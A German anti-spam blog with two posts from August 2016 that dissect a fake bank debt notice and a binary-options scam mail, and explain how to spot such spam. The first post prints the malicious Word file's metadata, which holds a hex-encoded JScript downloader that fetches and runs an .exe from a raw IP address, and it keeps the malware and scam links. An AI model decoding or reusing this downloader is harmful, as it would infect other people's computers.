Unser täglich Spam

Aus dem Internet frisch auf den Tisch. Köstlich und aromatisch.


Tagesarchiv für den 12. August 2016

Info von ihre Bank

Freitag, 12. August 2016

Ja, ich weiß, Spammer: Flektierende Sprachen sind wirklich schwierig zu beherrschen. Übung könnte einen Meister machen. Aber nicht bei dir, denn du willst ja nur spammen.

Sehr geehrter Kunde!

Diese Mail eines unbekannten Absenders beginnt mit der Behauptung, dass man dort „Kunde“ sei, aber der Name des „Kunden“ ist beim Absender offenbar nicht bekannt. Über diese Kleinigkeit geht er hinweg, indem er behauptet…

Ihre Bank hat die Lastschrift zuruck buchen lassen. Sie haben eine ungedeckte Rechnung bei HSH Nordbank.
Bitte laden Sie die Datei aus dem Link:
http://www.1800cloud.com/infos/report.doc

…dass man eine unbeglichene Rechnung hat, weil ein Bankkonto mit einer ungenannten Kontonummer nicht gedeckt war. Eine Rechnung für irgendwas. Bei irgendwem. Über irgendeinen Betrag. Von irgendwann. Irgendetwas Näheres zur angeblichen Sache kann man nur erfahren, wenn man ein Word-Dokument öffnet, das in der anonym formulierten E-Mail eines Unbekannten verlinkt wurde.

Wenn man das nicht sofort und möglichst hirnlos tut…

Aufgrund des andauernden Zahlungsruckstands sind Sie verpflichtet auberdem [sic!], die durch unsere Beauftragung entstandenen Kosten von 19,67 Euro zu bezahlen. Wir erwarten die Zahlung bis spatestens 17.08.2016 auf unser Konto. Namens und in Vollmacht unseren Mandanten fordern wir Sie auf, die offene Forderung sofort zu begleichen.

Bitte beachten Sie, dass keine weitere Mahnung erfolgt. Nach Ablauf der festgelegten Frist wird die Angelegenheit dem Staatsanwalt und der Schufa ubergeben. Die vollstandige Forderungsausstellung, der Sie alle Positionen entnehmen konnen, fugen wir bei. Fur Ruckfragen oder Anregungen erwarten wir eine Kontaktaufnahme innerhalb des selben Zeitraums.

…geht es gleich zu Staatsanwalt und Schufa, statt ganz normal beim zuständigen Mahngericht einen Mahnbescheid zu beantragen. Der Spammer weiß ja genau, dass Angst dumm macht – und man muss schon ein bisschen dumm sein, um eine Datei zu öffnen, die einem mit Spam zugestellt wurde.

Leben Sie wohl!

Geh sterben, Spammer!

Die angehängte Datei ist…

$ file report.doc | sed 's/, /\n/g'
report.doc: Composite Document File V2 Document
Little Endian
Os: Windows
Version 6.1
Code page: 1251
Title:  
Subject: b
Author: c
Keywords: g
Comments: 66756e6374696f6e20737461727428297b7472797b76617220783d6e657720416374697665584f626a65637428226d73786d6c322e786d6c6874747022293b76617220663d6e657720416374697665584f626a6563742822736372697074696e672e66696c6573797374656d6f626a65637422293b76617220773d6e657720416374697665584f626a6563742822777363726970742e7368656c6c22293b76617220613d6e657720416374697665584f626a656374282261646f64622e73747265616d22293b76617220703d772e457870616e64456e7669726f6e6d656e74537472696e6773282225746d702522292b225c5c33313230392e657865223b782e6f70656e2822474554222c22687474703a2f2f38382e3131392e3137392e3136302f316269796375686f7165747a6f776161776e6561622e657865222c66616c7365293b782e73656e6428293b696628782e737461747573203d3d20323030297b696628662e66696c65657869737473287029297b662e64656c65746566696c652870293b7d612e6f70656e28293b612e747970653d313b612e777269746528782e726573706f6e7365626f6479293b612e73617665746f66696c652870293b612e636c6f736528293b772e72756e28702c312c30293b7d7d63617463682865297b7d7d
Template: Normal.dot
Last Saved By: admin
Revision Number: 2
Name of Creating Application: Microsoft Office Word
Create Time/Date: Sat Aug  6 17:17:00 2016
Last Saved Time/Date: Sat Aug  6 17:17:00 2016
Number of Pages: 1
Number of Words: 23
Number of Characters: 116
Security: 0
$ _

…ein in null Sekunden erstelltes Dokument für Microsoft Word, das 23 Wörter auf einer Seite enthält. Wer es öffnet und trotz der Warnung die Ausführung von Makros in Word zulässt, hat hinterher einen Computer anderer Leute auf dem Schreibtisch stehen. Damit man auch wirklich so dumm ist, trotz der Warnung den Programmcode von Spammer ausführen zu lassen, steht ein Hinweis im Dokument:

Attention! This document was created in a newer version of Microsoft Office. To display the contents of the document need to enable macros

Kurz und schnell gesagt: Es handelt sich um Schadsoftware. Natürlich ist es wieder einmal die frischeste Brut der Kriminellen, und deshalb wird der verbrecherische Müll (der vermutlich einen Erpressungstrojaner aus dem Internet nachlädt) zurzeit nur von einer Minderheit der gängigen Antivirus-Schlangenöle erkannt. Wer sich auf sein Antivirus-Programm verlassen hat, ist also wieder einmal verlassen.

Deshalb ist es so wichtig, niemals auf derartige Spam hereinzufallen, sondern sie zu erkennen. Das ist in diesem Fall relativ einfach gewesen:

  1. Man ist angeblich Kunde, wird aber in einer E-Mail nicht persönlich angesprochen.
  2. Es ist völlig unklar, wer der Absender der E-Mail ist. Es gibt keinerlei Angaben für eine eventuelle Rückfrage.
  3. Es ist eine angebliche Mahnung, aber im Text der Mail fehlen sämtliche Angaben zum Gegenstand der Mahnung. Stattdessen soll in die Mail geklickt werden, um zu erfahren, um was es überhaupt geht.
  4. Der Text der Mail strotzt vor beängstigendem Bullshit, der in dieser Form niemals von einem Kaufmann oder einem Rechtsanwalt geschrieben würde.
  5. „Leben Sie wohl!“ als Abschiedsformel bedarf keiner weiteren Kommentierung

Generell sind Dateien, die ohne vorherige Absprache mit E-Mail zugestellt wurden, mit äußerster Vorsicht zu behandeln. E-Mail ist bei Kriminellen so beliebt, weil es sich um einen Weg handelt, jemanden anders Dateien und ausführbaren Code auf die Festplatte zu spielen – und zwar mit beliebig fälschbarem Absender. Auch bei bekannten Absendern niemals eine derartige Datei öffnen, ohne vorher auf einem anderen Weg als über E-Mail (zum Beispiel telefonisch) kurz Rücksprache gehalten zu haben! Antivirus-Programme nützen gar nichts. Ich wiederhole, weil die Werbung und die Computerjournaille ständig das Gegenteil behauptet: Antivirus-Programme nützen gar nichts. Wenn man sich darauf verlässt, sind sie sogar gefährlich. Das beste Antivirus-Programm ist und bleibt das Gehirn.

ACHTUNG! – E-MAIL NUR FÜR !

Freitag, 12. August 2016

Für was? Für die Mülltonne? :mrgreen:

Hallo,

Nicht ganz mein Name.

Nicht Verpassen gammelfleisch@tamagothi.de !!

Auch nicht mein Name.

In die Spam eingebettete Grafik

Mit diesem freundlichen Verbrauchtwagenverkäufer vor einem Klapprechner habe ich auch nichts zu tun, ebensowenig mit der würdelos gealterten Opferfrau, die ihm an den Lippen hängt, wenn er seine Lügen erzählt und dazu mit irgendwelchen Zetteln rumwedelt.

Sie sind dabei Sie wurden
persönlich ausgewählt es zu bekommen vor all den
anderen…

Ein „persönlich ausgewählt“ in einer völlig unpersönlich formulierten Mail wirkt fast so überzeugend wie ein Foto im Stile einer Siebziger-Jahre-Reklame.

PLUS Sie
werden eine erhebliche Summe als Willkommen-Geschenk bekommen

Wie? Bargeld? Mit dem ich Lakritz kaufen kann? Oder doch eher so etwas wie die virtuellen Jetons eines Abzockcasinos, die man dafür zusätzlich bekommt, dass man echtes Geld in virtuelle Jetons eintauscht – so dass man gleich bemerkt, wie wenig Wert die auf dem Computer angezeigte Zahl in Wirklichkeit hat.

Aber hey, jemand wird schon anbeißen, wenn so lecker lecker Geld am Angelhaken hängt. Und dann…

Holen Sie es sich sofort
hier unten

http://trend-trader.net/de/?p=[ID entfernt]

…wird klicki klicki ganz unten zugeschnappt… ähm… geklickt.

Es handelt sich um eine HTML-formatierte Spam, und der Link geht nicht etwa auf die URI, die im Text sichtbar ist, sondern in die Domain graccu.com, die schon vor längerer Zeit mit der Anschrift eines Trend-Spammers aus dem brummenden Tirana registriert wurde. Wer sich einmal die Startseite der Website in dieser Domain anschauen möchte, wird allerdings nicht mit Geld willkommen geheißen, sondern…

$ lynx -mime_header http://graccu.com/
HTTP/1.1 301 Moved Permanently
Date: Fri, 12 Aug 2016 07:52:42 GMT
Server: Apache
Location: http://tradingdroid.net/
Content-Length: 232
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://tradingdroid.net/">here</a>.</p>
</body></html>
$ _

…weitergeleitet, um dann zu lesen…

$ lynx -mime_header http://tradingdroid.net/
HTTP/1.1 200 OK
Date: Fri, 12 Aug 2016 07:53:29 GMT
Server: Apache/2.4.23 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Last-Modified: Thu, 11 Aug 2016 12:05:37 GMT
ETag: "6a0fbc-f-539ca9571e640"
Accept-Ranges: bytes
Content-Length: 15
Connection: close
Content-Type: text/html

GET OUT OF HERE
$ _

…dass er sich verpissen soll.

Die Domain tradingdroid (punkt) net ist übrigens in allen Blacklists dieser Welt wegen Spam wohlbekannt:

Screenshot des Ergebnisses einer Domainabfrage bei SURBL: tradingdroid.net is on SURBL lists: ABUSE

Deshalb wird sie auch nicht direkt verlinkt, denn sonst käme die Spam ja bei niemanden mehr an. Es ist übrigens auch für Laien sehr einfach, über die SURBL-Website für eine Domain zu prüfen, ob sie in SURBL-Listen enthalten ist. Die einzige „technische“ Herausforderung besteht darin, ein Captcha zu lösen. Wer keine Captchas lösen will oder kann (zum Beispiel werden Blinde mit solchen Scheinsicherungen ausgesperrt), kann immer noch die technische Schnittstelle verwenden und über eine DNS-Abfrage prüfen, ob eine Domain in einer SURBL-Liste enthalten ist:

$ dig tradingdroid.net.multi.surbl.org | sed -e '/^;/d' -e '/^\s*$/d'
tradingdroid.net.multi.surbl.org. 114 IN A	127.0.0.64
$ _

Die 64 steht für die ABUSE-Liste¹ – und die beiden regulären Ausdrücke für sed entfernen eine Menge in diesem Kontext nur störender Zusatzangaben und Kommentare. Ob es für blinde und schwer körperbehinderte Menschen zumutbar ist, eine derartige technische Schnittstelle benutzen zu müssen, um kurz nachzuschauen, ob eine Domain koscher ist? Meiner Meinung nach nicht. Captchas sind immer eine schlechte Idee. Zum Glück ist auf den meisten Mailservern ein Spamfilter installiert, der solche Abfragen automatisch durchführt und Mails mit derartigen Links ausfiltert.

Um zu sehen, was einem in dieser massiv spambeworbenen Domain für tolle Trend-Betrügereien angeboten werden, muss man schon den Link aus der Spam mit allen Parametern verwenden. Wer das mit einer modernen Mailsoftware macht, bekommt vorher noch eine deutliche Warnung zu sehen:

Thunderbird hält diese Nachricht für verdächtig! -- Es könnte sein, dass die Nachricht zu einer betrügerischen Webseite führt, die eine andere Webseite optisch imitiert. Eventuell möchte man Ihnen sensible Daten stehlen (z.B. PIN, TAN, Benutzernamen, Passwörter, etc.). -- Wollen Sie wirklich die folgende Webseite besuchen? -- graccu.com -- [Nein] [Ja]

Wie es zu dieser Warnung kommt? Nun, es gibt keinen einzigen legitimen Grund, einen Linktext zu schreiben, der wie eine URI aussieht, aber einen Link in eine völlig andere Domain zu setzen. Nur Kriminelle haben solche Irreführungen nötig. Leider sind es ausgerechnet die unerfahrenen und naiven Internetnutzer, die zwar eine solche Warnung dringend nötig hätten, aber davor zurückscheuen, ihre E-Mail mit einer guten Mailsoftware zu machen. Stattdessen verwenden sie lieber die „bequemen“ Webmailer ihres E-Mail-Providers. Weil sie Angst haben, dass sie mit der „komplizierten“ Einrichtung einer guten Software überfordert wären, obwohl sie im Regelfall wirklich sehr einfach ist. Ich kann nur dazu auffordern, einfach mal den Thunderbird auszuprobieren. Schon nach wenigen Tagen wird man nichts anderes mehr verwenden wollen.

Aber die Menschen, die dieser Aufforderung noch bedürfen, haben sich vermutlich schon beim Anblick meiner „Kommandozeilenakrobatik“ mit Grauen abgewendet. :(

Nach derart langer Vorrede mit vielen Abschweifungen jetzt endlich zur Hauptsache: Was will mir der freundliche Spammer hier anbieten? Oh, er hat eine völlig neue Methode, mit der jede amputierte Laborratte vollautomatisch durch Handel mit hochspekulativen Wettzetteln der Marke „Binäre Option“ eine Menge Geld machen kann. Oder, um es mit den Worten der tollen Website zu sagen: „Der Hauptalgorithmus des TREND TRADERS ist auf wiederholenden Mustern basiert, erkannt von unseren Finanzdatenbanken, entwickelt worden!“. Tja, es ist schon ein bisschen schade, wenn man eine Methode hat, um einfach an der Börse Geld zu erzeugen, aber die paar Euro fuffzig für einen richtigen Dolmetscher nicht erübrigen mag. :mrgreen:

Die spambeworbene Betrügerseite sieht übrigens so aus:

Screenshot der betrügerischen Website

Sehr überzeugend! Was man nicht braucht, ist Schulbildung. Wer würde da nicht sofort seine BESTE E-MAIL-ADRESSE eingeben?! :mrgreen:

Nicht Verpassen
info@plethoraonline.com !!

Apropos E-Mail-Adresse… das ist aber nicht meine. Offenbar ist der geniale Reichwerdexperte mit seiner tollen automatischen Handelssoftware für hochspekulative Wettzettel nicht dazu imstande, ein Spamskript so zu schreiben, dass es fehlerfrei ist. Aber dafür ist ganz sicher die Software fehlerfrei. Muss man nur ganz feste dran glauben. Dann stimmt es auch. :D

Dies ist kein falscher Ausdruck aber es
steht zu Verfügung nur für die ersten Wenigen.

Es wird an dem nächsten Benutzer
verschenkt wenn Sie es nicht nehmen

Wie, kein falscher Ausdruck. Ich habe doch gar nichts gedruckt. Und dafür, dass das ganze Binäre-Optionen-Zeug so immer so gut und schnell weggeht, bekomme ich aber immer ganz schön viel Spam dafür. (Wer einmal die gesamte, in meinem Spameingang geschehene Geschichte der Binäre-Optionen-Nummer verfolgen möchte, lege sich eine Familienportion Popcorn bereit und klicke mutig auf den Link!) Einmal ganz davon abgesehen, dass es ohne Spam überhaupt nicht wegzugehen scheint. Wer hat denn schon Interesse an Geld? :mrgreen:

Wir
sprechen uns bald

Oh, ich würde so gern mal mit dir sprechen, Spammer. Meine Gesprächsführung wäre zwar ein allumfassender Verstoß gegen die Erklärung der Menschenrechte, aber so ein Geschmeiß wie du ist ja auch eher im biologischen Sinn des Wortes ein Mensch, nicht in irgendeinem höheren… :evil:

Wolfgang Büttner

Ein Name, so echt wie die lustigen Behauptungen aus der Spam.

¹Es ist in Wirklichkeit noch ein bisschen „schlimmer“. In der Zahl ist bitweise codiert, auf welchen Listen eine Domain erscheint. Diese Schnittstelle ist für Programme gedacht, nicht für die direkte Benutzung durch Menschen. Wer GNU/Linux benutzt und häufiger solche Abfragen machen möchte, wird vielleicht dieses kleine Shellskript mögen.